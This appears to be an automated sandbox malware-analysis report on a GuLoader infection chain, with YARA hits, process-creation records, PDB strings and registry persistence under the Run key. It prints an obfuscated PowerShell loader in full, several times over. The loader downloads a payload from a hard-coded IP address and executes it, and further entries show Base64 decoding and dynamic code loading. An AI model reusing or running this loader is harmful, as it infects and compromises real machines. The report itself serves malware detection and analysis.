Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2494599943.000000001FBC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2489818539.000000001FA12000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2618102098.00000000030D7000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2620352047.000000000328B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2455355993.0000000008130000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: recover.pdbGCTL source: wab.exe, 0000000A.00000003.2572034726.0000000004355000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358338282.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tem.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2448417031.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: stem.Core.pdb/ source: powershell.exe, 00000005.00000002.2455355993.0000000008130000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2448417031.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wab.pdbGCTL source: recover.exe, 0000000D.00000002.3359350898.0000000003A6C000.00000004.10000000.00040000.00000000.sdmp, recover.exe, 0000000D.00000002.3357718213.0000000002DF5000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2712305757.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3263016249.000000000414C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: wab.pdb source: recover.exe, 0000000D.00000002.3359350898.0000000003A6C000.00000004.10000000.00040000.00000000.sdmp, recover.exe, 0000000D.00000002.3357718213.0000000002DF5000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2712305757.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3263016249.000000000414C000.00000004.80000000.00040000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("PowerShell.exe", ""$Caked124 = 1;$Allegroernes15='S';$All", "", "", "0");
Yara detected GuLoader
Source: Yara match File source: 00000005.00000002.2459777266.0000000009FC7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2449498441.000000000580F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2456067729.0000000008600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2640024983.000002432CDEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Transpatronized)$global:Decentralised = [System.Text.Encoding]::ASCII.GetString($Unlaid)$global:Museumise=$Decentralised.substring(307583,25216)<#Strygeinstrumentet Anelsers Leisured
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Gallantise $Minimumslaengden $Leewill), (Delyst @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tekststumpernes = [AppDomain]::CurrentDomain.GetAssemblies(
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Transponeredes)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Tapinocephalic, $false).DefineType($Enmesh
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Transpatronized)$global:Decentralised = [System.Text.Encoding]::ASCII.GetString($Unlaid)$global:Museumise=$Decentralised.substring(307583,25216)<#Strygeinstrumentet Anelsers Leisured
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348B78FB push ebx; retf 2_2_00007FFD348B796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348B7958 push ebx; retf 2_2_00007FFD348B796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348B00BD pushad ; iretd 2_2_00007FFD348B00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD349871C8 push esp; retf 2_2_00007FFD349871C9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_074B08D8 push eax; mov dword ptr [esp], ecx 5_2_074B0AC4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA09AD push ecx; mov dword ptr [esp], ecx 10_2_1FDA09B6
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034709AD push ecx; mov dword ptr [esp], ecx 13_2_034709B6
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D04220 push ds; iretd 13_2_02D04248
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D09028 push cs; iretd 13_2_02D0902A
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D0A68E push edx; iretd 13_2_02D0A6BC
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02CFE655 push cs; retf 13_2_02CFE68F
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02CFE660 push cs; retf 13_2_02CFE68F
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02CF778D push ds; iretd 13_2_02CF778F
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D0F58B pushfd ; ret 13_2_02D0F58C
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D0CE5F push ds; retf 13_2_02D0CE69
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02CF3F9E push ecx; retf 13_2_02CF3FA9
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D09C45 push cs; retf 13_2_02D09C4F
Source: C:\Windows\SysWOW64\recover.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run T61TH2R0 Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run T61TH2R0 Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
